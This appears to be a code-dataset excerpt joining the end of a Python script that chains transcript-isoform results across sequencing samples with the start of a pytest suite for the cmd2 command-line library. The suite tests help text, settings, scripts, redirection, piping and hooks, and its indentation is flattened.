for r in reader:
saw_NA = False
r0 = r
answer = defaultdict(lambda: 'NA') # ex: 1009 --> PB.1.1
answer2 = defaultdict(lambda: 'NA') # ex: 1009 --> count
answer[chain[-1]] = r[chain[-1]]
if r[chain[-1]] !='NA':
answer2[chain[-1]] = count_info[chain[-1], answer[chain[-1]]]
for c in chain[::-1][1:-1]: # the first sample does not have tmp_, because it's not a chain
if r['tmp_'+c] == 'NA':
saw_NA = True
break
else:
r2 = d['tmp_'+c, r['tmp_'+c]]
answer[c] = r2[c]
if answer[c] != 'NA':
answer2[c] = count_info[c, answer[c]]
r = r2
if not saw_NA:
answer[chain[0]] = r[chain[0]]
if answer[chain[0]] !='NA':
answer2[chain[0]] = count_info[chain[0], answer[chain[0]]]
rec1 = {'superPBID': r0['superPBID']}
rec2 = {'superPBID': r0['superPBID']}
for c in chain:
rec1[c] = answer[c]
rec2[c] = str(answer2[c])
writer1.writerow(rec1)
writer2.writerow(rec2)
f1.close()
f2.close()
shutil.copyfile('tmp_' + chain[-1] + '.gff', 'all_samples.chained.gff')
if fastq_filename is not None:
shutil.copyfile('tmp_' + chain[-1] + '.rep.fq', 'all_samples.chained.rep.fq')
print("Chained output written to:", file=sys.stdout)
print("all_samples.chained.gff", file=sys.stdout)
print(f1.name, file=sys.stdout)
print(f2.name, file=sys.stdout)
if fastq_filename is not None:
print("all_samples.chained.rep.fq", file=sys.stdout)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("config_file")
parser.add_argument("field_to_use", choices=['norm_fl', 'count_fl'], default='count_fl', help="Which count field to use for chained sample (default: count_fl)")
parser.add_argument("--fuzzy_junction", default=0, type=int, help="Max allowed distance in junction to be considered identical (default: 0 bp)")
parser.add_argument("--dun-merge-5-shorter", action="store_false", dest="allow_5merge", default=True, help="Don't collapse shorter 5' transcripts (default: off)")
parser.add_argument("--max_3_diff", type=int, default=30, help="Maximum 3' difference allowed (default: 30bp)")
parser.add_argument("--cpus", type=int, default=8, help="Number of CPUs to use for multi-threading (default: 8)")
args = parser.parse_args()
sample_dirs, sample_names, group_filename, gff_filename, count_filename, fastq_filename = read_config(args.config_file)
chain_samples_multithread(sample_dirs, sample_names, group_filename, gff_filename, count_filename, args.field_to_use, args.fuzzy_junction, args.allow_5merge, args.max_3_diff, fastq_filename, cpus=args.cpus)
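    # Illustrative invocation (hypothetical config file name):
    #   python chain_samples.py sample.config count_fl --cpus 8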
|
test_cmd2.py
|
# coding=utf-8
# flake8: noqa E302
"""
Cmd2 unit/functional testing
"""
import argparse
import builtins
import io
import os
import sys
import tempfile
from code import InteractiveConsole
import pytest
import cmd2
from cmd2 import COMMAND_NAME, ansi, clipboard, constants, exceptions, plugin, utils
from .conftest import (
HELP_HISTORY,
SHORTCUTS_TXT,
SHOW_LONG,
SHOW_TXT,
complete_tester,
normalize,
odd_file_names,
run_cmd,
verify_help_text,
)
# Python 3.5 had some regressions in the unittest.mock module, so use 3rd party mock if available
try:
import mock
except ImportError:
from unittest import mock
def CreateOutsimApp():
c = cmd2.Cmd()
c.stdout = utils.StdSim(c.stdout)
return c
@pytest.fixture
def outsim_app():
return CreateOutsimApp()
def test_version(base_app):
assert cmd2.__version__
def test_not_in_main_thread(base_app, capsys):
import threading
cli_thread = threading.Thread(name='cli_thread', target=base_app.cmdloop)
cli_thread.start()
cli_thread.join()
out, err = capsys.readouterr()
assert "cmdloop must be run in the main thread" in err
def test_empty_statement(base_app):
out, err = run_cmd(base_app, '')
expected = normalize('')
assert out == expected
def test_base_help(base_app):
out, err = run_cmd(base_app, 'help')
verify_help_text(base_app, out)
def test_base_help_verbose(base_app):
out, err = run_cmd(base_app, 'help -v')
verify_help_text(base_app, out)
# Make sure :param type lines are filtered out of help summary
help_doc = base_app.do_help.__func__.__doc__
help_doc += "\n:param fake param"
base_app.do_help.__func__.__doc__ = help_doc
out, err = run_cmd(base_app, 'help --verbose')
verify_help_text(base_app, out)
assert ':param' not in ''.join(out)
def test_base_argparse_help(base_app):
# Verify that "set -h" gives the same output as "help set" and that it starts in a way that makes sense
out1, err1 = run_cmd(base_app, 'set -h')
out2, err2 = run_cmd(base_app, 'help set')
assert out1 == out2
assert out1[0].startswith('Usage: set')
assert out1[1] == ''
assert out1[2].startswith('Set a settable parameter')
def test_base_invalid_option(base_app):
out, err = run_cmd(base_app, 'set -z')
assert err[0] == 'Usage: set [-h] [-v] [param] [value]'
assert 'Error: unrecognized arguments: -z' in err[1]
def test_base_shortcuts(base_app):
out, err = run_cmd(base_app, 'shortcuts')
expected = normalize(SHORTCUTS_TXT)
assert out == expected
def test_command_starts_with_shortcut():
with pytest.raises(ValueError) as excinfo:
app = cmd2.Cmd(shortcuts={'help': 'fake'})
assert "Invalid command name 'help'" in str(excinfo.value)
def test_base_show(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set')
expected = normalize(SHOW_TXT)
assert out == expected
def test_base_show_long(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -v')
expected = normalize(SHOW_LONG)
assert out == expected
def test_set(base_app):
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
def test_set_val_empty(base_app):
base_app.editor = "fake"
out, err = run_cmd(base_app, 'set editor ""')
assert base_app.editor == ''
def test_set_val_is_flag(base_app):
base_app.editor = "fake"
out, err = run_cmd(base_app, 'set editor "-h"')
assert base_app.editor == '-h'
def test_set_not_supported(base_app):
out, err = run_cmd(base_app, 'set qqq True')
expected = normalize("""
Parameter 'qqq' not supported (type 'set' for list of parameters).
""")
assert err == expected
def test_set_no_settables(base_app):
base_app.settables = {}
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("There are no settable parameters")
assert err == expected
@pytest.mark.parametrize('new_val, is_valid, expected', [
(ansi.STYLE_NEVER, True, ansi.STYLE_NEVER),
('neVeR', True, ansi.STYLE_NEVER),
(ansi.STYLE_TERMINAL, True, ansi.STYLE_TERMINAL),
('TeRMInal', True, ansi.STYLE_TERMINAL),
(ansi.STYLE_ALWAYS, True, ansi.STYLE_ALWAYS),
('AlWaYs', True, ansi.STYLE_ALWAYS),
('invalid', False, ansi.STYLE_TERMINAL),
])
def test_set_allow_style(base_app, new_val, is_valid, expected):
# Initialize allow_style for this test
ansi.allow_style = ansi.STYLE_TERMINAL
# Use the set command to alter it
out, err = run_cmd(base_app, 'set allow_style {}'.format(new_val))
# Verify the results
assert ansi.allow_style == expected
if is_valid:
assert not err
assert "now: {!r}".format(new_val.capitalize()) in out[1]
# Reset allow_style to its default since it's an application-wide setting that can affect other unit tests
ansi.allow_style = ansi.STYLE_TERMINAL
class OnChangeHookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_settable(utils.Settable('quiet', bool, "my description", onchange_cb=self._onchange_quiet))
def _onchange_quiet(self, name, old, new) -> None:
"""Runs when quiet is changed via set command"""
self.poutput("You changed " + name)
@pytest.fixture
def onchange_app():
app = OnChangeHookApp()
return app
def test_set_onchange_hook(onchange_app):
out, err = run_cmd(onchange_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
You changed quiet
""")
assert out == expected
def test_base_shell(base_app, monkeypatch):
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, 'shell echo a')
assert out == []
assert m.called
def test_shell_last_result(base_app):
base_app.last_result = None
run_cmd(base_app, 'shell fake')
assert base_app.last_result is not None
def test_shell_manual_call(base_app):
# Verifies crash from Issue #986 doesn't happen
cmds = [
'echo "hi"',
'echo "there"',
'echo "cmd2!"'
]
cmd = ';'.join(cmds)
base_app.do_shell(cmd)
cmd = '&&'.join(cmds)
base_app.do_shell(cmd)
def test_base_py(base_app):
# Make sure py can't edit Cmd.py_locals. It used to be that cmd2 was passing its py_locals
# dictionary to the py environment instead of a shallow copy.
base_app.py_locals['test_var'] = 5
out, err = run_cmd(base_app, 'py del[locals()["test_var"]]')
assert not out and not err
assert base_app.py_locals['test_var'] == 5
out, err = run_cmd(base_app, 'py print(test_var)')
assert out[0].rstrip() == '5'
# Place an editable object in py_locals. Since we make a shallow copy of py_locals,
# this object should be editable from the py environment.
base_app.py_locals['my_list'] = []
out, err = run_cmd(base_app, 'py my_list.append(2)')
assert not out and not err
assert base_app.py_locals['my_list'][0] == 2
# Try a print statement
out, err = run_cmd(base_app, 'py print("spaces" + " in this " + "command")')
assert out[0].rstrip() == 'spaces in this command'
# Set self_in_py to True and make sure we see self
base_app.self_in_py = True
out, err = run_cmd(base_app, 'py print(self)')
assert 'cmd2.cmd2.Cmd object' in out[0]
# Set self_in_py to False and make sure we can't see self
base_app.self_in_py = False
out, err = run_cmd(base_app, 'py print(self)')
assert "NameError: name 'self' is not defined" in err
def test_base_error(base_app):
out, err = run_cmd(base_app, 'meow')
assert "is not a recognized command" in err[0]
def test_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
    # Get output from the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_with_empty_args(base_app):
out, err = run_cmd(base_app, 'run_script')
assert "the following arguments are required" in err[1]
def test_run_script_with_nonexistent_file(base_app, capsys):
out, err = run_cmd(base_app, 'run_script does_not_exist.txt')
assert "does not exist" in err[0]
def test_run_script_with_directory(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
out, err = run_cmd(base_app, 'run_script {}'.format(test_dir))
assert "is not a file" in err[0]
def test_run_script_with_empty_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'empty.txt')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert not out and not err
def test_run_script_with_binary_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'binary.bin')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "is not an ASCII or UTF-8 encoded text file" in err[0]
def test_run_script_with_python_file(base_app, request):
m = mock.MagicMock(name='input', return_value='2')
builtins.input = m
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'pyscript', 'stop.py')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "appears to be a Python file" in err[0]
def test_run_script_with_utf8_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'utf8.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
    # Get output from the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_nested_run_scripts(base_app, request):
# Verify that running a script with nested run_script commands works correctly,
# and runs the nested script commands in the correct order.
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'nested.txt')
# Run the top level script
initial_run = 'run_script ' + filename
run_cmd(base_app, initial_run)
# Check that the right commands were executed.
expected = """
%s
_relative_run_script precmds.txt
set allow_style Always
help
shortcuts
_relative_run_script postcmds.txt
set allow_style Never""" % initial_run
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
prefilepath = os.path.join(test_dir, 'scripts', 'precmds.txt')
postfilepath = os.path.join(test_dir, 'scripts', 'postcmds.txt')
base_app.runcmds_plus_hooks(['run_script ' + prefilepath,
'help',
'shortcuts',
'run_script ' + postfilepath])
expected = """
run_script %s
set allow_style Always
help
shortcuts
run_script %s
set allow_style Never""" % (prefilepath, postfilepath)
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks_ctrl_c(base_app, capsys):
"""Test Ctrl-C while in runcmds_plus_hooks"""
import types
def do_keyboard_interrupt(self, _):
raise KeyboardInterrupt('Interrupting this command')
setattr(base_app, 'do_keyboard_interrupt', types.MethodType(do_keyboard_interrupt, base_app))
# Default behavior is to stop command loop on Ctrl-C
base_app.history.clear()
base_app.runcmds_plus_hooks(['help', 'keyboard_interrupt', 'shortcuts'])
out, err = capsys.readouterr()
assert err.startswith("Interrupting this command")
assert len(base_app.history) == 2
# Ctrl-C should not stop command loop in this case
base_app.history.clear()
base_app.runcmds_plus_hooks(['help', 'keyboard_interrupt', 'shortcuts'], stop_on_keyboard_interrupt=False)
out, err = capsys.readouterr()
assert not err
assert len(base_app.history) == 3
def test_relative_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
    # Get output from the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
@pytest.mark.parametrize('file_name', odd_file_names)
def test_relative_run_script_with_odd_file_names(base_app, file_name, monkeypatch):
"""Test file names with various patterns"""
# Mock out the do_run_script call to see what args are passed to it
run_script_mock = mock.MagicMock(name='do_run_script')
monkeypatch.setattr("cmd2.Cmd.do_run_script", run_script_mock)
run_cmd(base_app, "_relative_run_script {}".format(utils.quote_string(file_name)))
run_script_mock.assert_called_once_with(utils.quote_string(file_name))
def test_relative_run_script_requires_an_argument(base_app):
out, err = run_cmd(base_app, '_relative_run_script')
assert 'Error: the following arguments' in err[1]
def test_in_script(request):
class HookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_cmdfinalization_hook(self.hook)
def hook(self: cmd2.Cmd, data: plugin.CommandFinalizationData) -> plugin.CommandFinalizationData:
if self.in_script():
self.poutput("WE ARE IN SCRIPT")
return data
hook_app = HookApp()
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
out, err = run_cmd(hook_app, 'run_script {}'.format(filename))
assert "WE ARE IN SCRIPT" in out[-1]
def test_system_exit_in_command(base_app, capsys):
"""Test raising SystemExit from a command"""
import types
def do_system_exit(self, _):
raise SystemExit
setattr(base_app, 'do_system_exit', types.MethodType(do_system_exit, base_app))
stop = base_app.onecmd_plus_hooks('system_exit')
assert stop
def test_output_redirection(base_app):
fd, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(fd)
try:
# Verify that writing to a file works
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with open(filename) as f:
appended_content = f.read()
assert appended_content.startswith(content)
assert len(appended_content) > len(content)
except Exception:
raise
finally:
os.remove(filename)
def test_output_redirection_to_nonexistent_directory(base_app):
filename = '~/fakedir/this_does_not_exist.txt'
out, err = run_cmd(base_app, 'help > {}'.format(filename))
assert 'Failed to redirect' in err[0]
out, err = run_cmd(base_app, 'help >> {}'.format(filename))
assert 'Failed to redirect' in err[0]
def test_output_redirection_to_too_long_filename(base_app):
filename = '~/sdkfhksdjfhkjdshfkjsdhfkjsdhfkjdshfkjdshfkjshdfkhdsfkjhewfuihewiufhweiufhiweufhiuewhiuewhfiuwehfia' \
'ewhfiuewhfiuewhfiuewhiuewhfiuewhfiuewfhiuwehewiufhewiuhfiweuhfiuwehfiuewfhiuwehiuewfhiuewhiewuhfiueh' \
'fiuwefhewiuhewiufhewiufhewiufhewiufhewiufhewiufhewiufhewiuhewiufhewiufhewiuheiufhiuewheiwufhewiufheu' \
'fheiufhieuwhfewiuhfeiufhiuewfhiuewheiwuhfiuewhfiuewhfeiuwfhewiufhiuewhiuewhfeiuwhfiuwehfuiwehfiuehie' \
'whfieuwfhieufhiuewhfeiuwfhiuefhueiwhfw'
out, err = run_cmd(base_app, 'help > {}'.format(filename))
assert 'Failed to redirect' in err[0]
out, err = run_cmd(base_app, 'help >> {}'.format(filename))
assert 'Failed to redirect' in err[0]
def test_feedback_to_output_true(base_app):
base_app.feedback_to_output = True
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(f)
try:
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert content[-1].startswith('Elapsed: ')
    except Exception:
raise
finally:
os.remove(filename)
def test_feedback_to_output_false(base_app):
base_app.feedback_to_output = False
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='feedback_to_output', suffix='.txt')
os.close(f)
try:
out, err = run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert not content[-1].startswith('Elapsed: ')
assert err[0].startswith('Elapsed')
    except Exception:
raise
finally:
os.remove(filename)
def test_disallow_redirection(base_app):
# Set allow_redirection to False
base_app.allow_redirection = False
filename = 'test_allow_redirect.txt'
# Verify output wasn't redirected
out, err = run_cmd(base_app, 'help > {}'.format(filename))
verify_help_text(base_app, out)
# Verify that no file got created
assert not os.path.exists(filename)
def test_pipe_to_shell(base_app):
if sys.platform == "win32":
# Windows
command = 'help | sort'
else:
# Mac and Linux
        # Get help on help and pipe its output to the input of the word count shell command
command = 'help help | wc'
out, err = run_cmd(base_app, command)
assert out and not err
def test_pipe_to_shell_and_redirect(base_app):
filename = 'out.txt'
if sys.platform == "win32":
# Windows
command = 'help | sort > {}'.format(filename)
else:
# Mac and Linux
        # Get help on help and pipe its output to the input of the word count shell command
command = 'help help | wc > {}'.format(filename)
out, err = run_cmd(base_app, command)
assert not out and not err
assert os.path.exists(filename)
os.remove(filename)
def test_pipe_to_shell_error(base_app):
# Try to pipe command output to a shell command that doesn't exist in order to produce an error
out, err = run_cmd(base_app, 'help | foobarbaz.this_does_not_exist')
assert not out
assert "Pipe process exited with code" in err[0]
@pytest.mark.skipif(not clipboard.can_clip,
reason="Pyperclip could not find a copy/paste mechanism for your system")
def test_send_to_paste_buffer(base_app):
# Test writing to the PasteBuffer/Clipboard
run_cmd(base_app, 'help >')
paste_contents = cmd2.cmd2.get_paste_buffer()
verify_help_text(base_app, paste_contents)
# Test appending to the PasteBuffer/Clipboard
run_cmd(base_app, 'help history >>')
appended_contents = cmd2.cmd2.get_paste_buffer()
assert appended_contents.startswith(paste_contents)
assert len(appended_contents) > len(paste_contents)
def test_base_timing(base_app):
base_app.feedback_to_output = False
out, err = run_cmd(base_app, 'set timing True')
expected = normalize("""timing - was: False
now: True
""")
assert out == expected
if sys.platform == 'win32':
assert err[0].startswith('Elapsed: 0:00:00')
else:
assert err[0].startswith('Elapsed: 0:00:00.0')
def _expected_no_editor_error():
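    """Return the normalized error text cmd2 emits when the edit command is run without an editor configured."""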
expected_exception = 'OSError'
# If PyPy, expect a different exception than with Python 3
if hasattr(sys, "pypy_translation_info"):
expected_exception = 'EnvironmentError'
expected_text = normalize("""
EXCEPTION of type '{}' occurred with message: 'Please use 'set editor' to specify your text editing program of choice.'
To enable full traceback, run the following command: 'set debug true'
""".format(expected_exception))
return expected_text
def test_base_debug(base_app):
# Purposely set the editor to None
base_app.editor = None
# Make sure we get an exception, but cmd2 handles it
out, err = run_cmd(base_app, 'edit')
expected = _expected_no_editor_error()
assert err == expected
# Set debug true
out, err = run_cmd(base_app, 'set debug True')
expected = normalize("""
debug - was: False
now: True
""")
assert out == expected
# Verify that we now see the exception traceback
out, err = run_cmd(base_app, 'edit')
assert err[0].startswith('Traceback (most recent call last):')
def test_debug_not_settable(base_app):
# Set debug to False and make it unsettable
base_app.debug = False
base_app.remove_settable('debug')
# Cause an exception
out, err = run_cmd(base_app, 'bad "quote')
# Since debug is unsettable, the user will not be given the option to enable a full traceback
assert err == ['Invalid syntax: No closing quotation']
def test_remove_settable_keyerror(base_app):
with pytest.raises(KeyError):
base_app.remove_settable('fake')
def test_edit_file(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
run_cmd(base_app, 'edit {}'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
@pytest.mark.parametrize('file_name', odd_file_names)
def test_edit_file_with_odd_file_names(base_app, file_name, monkeypatch):
"""Test editor and file names with various patterns"""
# Mock out the do_shell call to see what args are passed to it
shell_mock = mock.MagicMock(name='do_shell')
monkeypatch.setattr("cmd2.Cmd.do_shell", shell_mock)
base_app.editor = 'fooedit'
run_cmd(base_app, "edit {}".format(utils.quote_string(file_name)))
shell_mock.assert_called_once_with('"fooedit" {}'.format(utils.quote_string(file_name)))
def test_edit_file_with_spaces(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'my commands.txt')
run_cmd(base_app, 'edit "{}"'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_blank(base_app, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
run_cmd(base_app, 'edit')
# We have an editor, so should expect a Popen call
m.assert_called_once()
def test_base_py_interactive(base_app):
# Mock out the InteractiveConsole.interact() call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='interact')
InteractiveConsole.interact = m
run_cmd(base_app, "py")
# Make sure our mock was called once and only once
m.assert_called_once()
def test_base_cmdloop_with_startup_commands():
intro = 'Hello World, this is an intro ...'
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog", 'quit']
expected = intro + '\n'
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
# Run the command loop with custom intro
app.cmdloop(intro=intro)
out = app.stdout.getvalue()
assert out == expected
def test_base_cmdloop_without_startup_commands():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_cmdloop_without_rawinput():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = False
app.echo = False
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
with pytest.raises(OSError):
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="stty sane only run on Linux/Mac")
def test_stty_sane(base_app, monkeypatch):
"""Make sure stty sane is run on Linux/Mac after each command if stdin is a terminal"""
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
# Mock out the subprocess.Popen call so we don't actually run stty sane
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
base_app.onecmd_plus_hooks('help')
m.assert_called_once_with(['stty', 'sane'])
class HookFailureApp(cmd2.Cmd):
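    """App whose postparsing hook sets stop=True, simulating a hook that halts the command loop."""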
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# register a postparsing hook method
self.register_postparsing_hook(self.postparsing_precmd)
def postparsing_precmd(self, data: cmd2.plugin.PostparsingData) -> cmd2.plugin.PostparsingData:
"""Simulate precmd hook failure."""
data.stop = True
return data
@pytest.fixture
def hook_failure():
app = HookFailureApp()
return app
def test_precmd_hook_success(base_app):
out = base_app.onecmd_plus_hooks('help')
assert out is False
def test_precmd_hook_failure(hook_failure):
out = hook_failure.onecmd_plus_hooks('help')
assert out is True
class SayApp(cmd2.Cmd):
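    """Minimal app with a say command that echoes its argument, used by the SIGINT interrupt tests."""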
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_say(self, arg):
self.poutput(arg)
@pytest.fixture
def say_app():
app = SayApp(allow_cli_args=False)
app.stdout = utils.StdSim(app.stdout)
return app
def test_interrupt_quit(say_app):
say_app.quit_on_sigint = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n'
def test_interrupt_noquit(say_app):
say_app.quit_on_sigint = False
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n^C\ngoodbye\n'
class ShellApp(cmd2.Cmd):
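    """App that enables default_to_shell so unrecognized commands fall through to the operating system shell."""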
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.default_to_shell = True
def test_default_to_shell(base_app, monkeypatch):
if sys.platform.startswith('win'):
line = 'dir'
else:
line = 'ls'
base_app.default_to_shell = True
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, line)
assert out == []
assert m.called
def test_ansi_prompt_not_escaped(base_app):
from cmd2.rl_utils import rl_make_safe_prompt
prompt = '(Cmd) '
assert rl_make_safe_prompt(prompt) == prompt
def test_ansi_prompt_escaped():
from cmd2.rl_utils import rl_make_safe_prompt
app = cmd2.Cmd()
color = 'cyan'
prompt = 'InColor'
color_prompt = ansi.style(prompt, fg=color)
readline_hack_start = "\x01"
readline_hack_end = "\x02"
readline_safe_prompt = rl_make_safe_prompt(color_prompt)
assert prompt != color_prompt
if sys.platform.startswith('win'):
# PyReadline on Windows doesn't suffer from the GNU readline bug which requires the hack
assert readline_safe_prompt.startswith(ansi.fg_lookup(color))
assert readline_safe_prompt.endswith(ansi.FG_RESET)
else:
assert readline_safe_prompt.startswith(readline_hack_start + ansi.fg_lookup(color) + readline_hack_end)
assert readline_safe_prompt.endswith(readline_hack_start + ansi.FG_RESET + readline_hack_end)
class HelpApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def help_app():
app = HelpApp()
return app
def test_custom_command_help(help_app):
out, err = run_cmd(help_app, 'help squat')
expected = normalize('This command does diddly squat...')
assert out == expected
def test_custom_help_menu(help_app):
out, err = run_cmd(help_app, 'help')
verify_help_text(help_app, out)
def test_help_undocumented(help_app):
out, err = run_cmd(help_app, 'help undoc')
assert err[0].startswith("No help on undoc")
def test_help_overridden_method(help_app):
out, err = run_cmd(help_app, 'help edit')
expected = normalize('This overrides the edit command and does nothing.')
assert out == expected
class HelpCategoriesApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category('Some Category')
def do_diddly(self, arg):
"""This command does diddly"""
pass
# This command will be in the "Some Category" section of the help menu even though it has no docstring
@cmd2.with_category("Some Category")
def do_cat_nodoc(self, arg):
pass
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
cmd2.categorize((do_squat, do_edit), 'Custom Category')
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def helpcat_app():
app = HelpCategoriesApp()
return app
def test_help_cat_base(helpcat_app):
out, err = run_cmd(helpcat_app, 'help')
verify_help_text(helpcat_app, out)
def test_help_cat_verbose(helpcat_app):
out, err = run_cmd(helpcat_app, 'help --verbose')
verify_help_text(helpcat_app, out)
class SelectApp(cmd2.Cmd):
